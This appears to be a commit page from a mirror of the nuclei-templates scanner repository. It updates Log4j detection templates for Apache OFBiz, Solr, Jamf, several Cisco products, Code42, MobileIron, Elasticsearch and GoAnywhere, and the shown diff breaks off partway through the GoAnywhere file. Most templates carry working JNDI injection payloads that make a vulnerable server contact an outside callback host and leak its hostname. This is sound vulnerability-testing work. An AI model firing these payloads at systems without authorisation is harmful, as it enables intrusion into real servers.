daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7170 from projectdiscovery/update-log4j 

Update All Existing Log4j Templates
patch-1
Ritik Chaddha 2023-05-11 13:13:19 +05:30 committed by GitHub
parent f06f67f38d a40d92e53b
commit 9082cb7329
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
25 changed files with 399 additions and 127 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
.new-additions
View File

@ -1,51 +1,55 @@
file/keys/postman-api-key.yaml cves/2017/CVE-2017-16894.yaml
headless/technologies/sap-spartacus.yaml cves/2020/CVE-2020-10199.yaml
http/cves/2017/CVE-2017-17731.yaml cves/2021/CVE-2021-25078.yaml
http/cves/2020/CVE-2020-27481.yaml cves/2021/CVE-2021-35250.yaml
http/cves/2021/CVE-2021-27314.yaml cves/2022/CVE-2022-0747.yaml
http/cves/2021/CVE-2021-27315.yaml cves/2022/CVE-2022-0769.yaml
http/cves/2021/CVE-2021-27316.yaml cves/2022/CVE-2022-0773.yaml
http/cves/2021/CVE-2021-27319.yaml cves/2022/CVE-2022-0846.yaml
http/cves/2021/CVE-2021-27320.yaml cves/2022/CVE-2022-0864.yaml
http/cves/2021/CVE-2021-30175.yaml cves/2022/CVE-2022-1903.yaml
http/cves/2021/CVE-2021-44228.yaml cves/2022/CVE-2022-2219.yaml
http/cves/2022/CVE-2022-24264.yaml cves/2022/CVE-2022-24223.yaml
http/cves/2022/CVE-2022-24265.yaml cves/2022/CVE-2022-25485.yaml
http/cves/2022/CVE-2022-24266.yaml cves/2022/CVE-2022-25486.yaml
http/cves/2022/CVE-2022-24716.yaml cves/2022/CVE-2022-25487.yaml
http/cves/2022/CVE-2022-27984.yaml cves/2022/CVE-2022-25488.yaml
http/cves/2022/CVE-2022-27985.yaml cves/2022/CVE-2022-25489.yaml
http/cves/2022/CVE-2022-3980.yaml cves/2022/CVE-2022-25497.yaml
http/cves/2022/CVE-2022-42095.yaml cves/2022/CVE-2022-27926.yaml
http/cves/2022/CVE-2022-42096.yaml cves/2022/CVE-2022-28032.yaml
http/cves/2022/CVE-2022-4328.yaml cves/2022/CVE-2022-3062.yaml
http/cves/2022/CVE-2022-45037.yaml cves/2022/CVE-2022-37190.yaml
http/cves/2022/CVE-2022-45038.yaml cves/2022/CVE-2022-37191.yaml
http/cves/2022/CVE-2022-46020.yaml cves/2022/CVE-2022-38295.yaml
http/cves/2023/CVE-2023-1020.yaml cves/2022/CVE-2022-38296.yaml
http/cves/2023/CVE-2023-1671.yaml cves/2022/CVE-2022-38467.yaml
http/cves/2023/CVE-2023-20864.yaml cves/2022/CVE-2022-41441.yaml
http/cves/2023/CVE-2023-25135.yaml cves/2022/CVE-2022-42094.yaml
http/cves/2023/CVE-2023-26360.yaml cves/2022/CVE-2022-4321.yaml
http/cves/2023/CVE-2023-27350.yaml cves/2023/CVE-2023-0099.yaml
http/cves/2023/CVE-2023-27524.yaml cves/2023/CVE-2023-22620.yaml
http/cves/2023/CVE-2023-29489.yaml cves/2023/CVE-2023-22897.yaml
http/cves/2023/CVE-2023-29922.yaml cves/2023/CVE-2023-27008.yaml
http/cves/2023/CVE-2023-30210.yaml cves/2023/CVE-2023-27159.yaml
http/cves/2023/CVE-2023-30212.yaml cves/2023/CVE-2023-27179.yaml
http/cves/2023/CVE-2023-31059.yaml cves/2023/CVE-2023-29084.yaml
http/cves/2023/CVE-2023-32235.yaml default-logins/trassir/trassir-default-login.yaml
http/default-logins/powerjob-default-login.yaml exposed-panels/appwrite-panel.yaml
http/default-logins/umami/umami-default-login.yaml exposed-panels/aspect-control-panel.yaml
http/exposed-panels/oracle-opera-login.yaml exposures/logs/yii-error-page.yaml
http/exposed-panels/papercut-ng-panel.yaml misconfiguration/apollo-adminservice-unauth.yaml
http/exposed-panels/proxmox-panel.yaml misconfiguration/default-spx-key.yaml
http/exposed-panels/red-lion-panel.yaml misconfiguration/sql-server-report-viewer.yaml
http/exposed-panels/sophos-web-appliance.yaml misconfiguration/thinkphp-errors.yaml
http/exposures/tokens/postman/postman-key.yaml network/detection/msmq-detect.yaml
http/misconfiguration/apache/apache-zeppelin-unauth.yaml network/enumeration/beanstalk-service.yaml
http/osint/mail-archive.yaml osint/hashnode.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml osint/imgbb.yaml
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml osint/rubygems.yaml
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml technologies/default-apache-shiro.yaml
http/vulnerabilities/wordpress/wpml-xss.yaml technologies/switch-protocol.yaml
vulnerabilities/generic/cache-poisoning-xss.yaml
vulnerabilities/huawei/huawei-firewall-lfi.yaml
vulnerabilities/others/universal-media-xss.yaml
vulnerabilities/wordpress/ldap-wp-login-xss.yaml

10
http/cves/2021/CVE-2021-45046.yaml
View File

@ -55,19 +55,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 2 group: 2
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/02/28 # Enhanced by mp on 2022/02/28

20
http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
View File

@ -22,12 +22,16 @@ info:
shodan-query: http.html:"Apache OFBiz" shodan-query: http.html:"Apache OFBiz"
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET /webtools/control/main HTTP/1.1 GET /webtools/control/main HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -39,13 +43,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27

21
http/vulnerabilities/apache/apache-solr-log4j-rce.yaml
View File

@ -24,11 +24,15 @@ info:
shodan-query: http.html:"Apache Solr" shodan-query: http.html:"Apache Solr"
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@timeout: 25s @timeout: 25s
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1 GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
attack: clusterbomb attack: clusterbomb
@ -52,10 +56,21 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 2
regex: regex:
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

28
http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -32,7 +36,7 @@ http:
Referer: {{RootURL}} Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,21 +45,31 @@ http:
words: words:
- "dns" - "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- type: word - type: word
part: body part: body
words: words:
- "<title>Jamf Pro Login</title>" - "<title>Jamf Pro Login</title>"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27

16
http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml → http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
View File

@ -22,13 +22,17 @@ info:
shodan-query: title:"CloudCenter Suite" shodan-query: title:"CloudCenter Suite"
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@timeout: 10s @timeout: 10s
POST /suite-auth/login HTTP/1.1 POST /suite-auth/login HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Content-Type: application/json Content-Type: application/json
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
@ -43,7 +47,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: header part: header
@ -55,10 +59,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22 # Enhanced by md on 2023/03/22

16
http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -41,17 +45,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04 # Enhanced by md on 2022/10/04

16
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -42,7 +46,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word - type: word
part: body part: body
@ -54,10 +58,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023 # Enhanced by CS 03/27/2023

20
http/vulnerabilities/code42/code42-log4j-rce.yaml
View File

@ -24,10 +24,14 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost' - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -39,13 +43,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27 # Enhanced by mp on 2022/05/27

20
http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}} Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -48,13 +52,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23

20
http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -47,13 +51,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23 # Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true" verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1 GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
{ {
@ -44,17 +48,23 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: kval - type: kval
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex - type: regex
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04 # Enhanced by md on 2022/10/04

16
http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true" verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http: http:
- raw: - raw:
- | - |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}} Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex - type: regex
part: interactsh_request part: interactsh_request
regex: regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors: extractors:
- type: regex - type: regex
@ -61,10 +65,16 @@ http:
kval: kval:
- interactsh_ip # Print remote interaction IP in output - interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
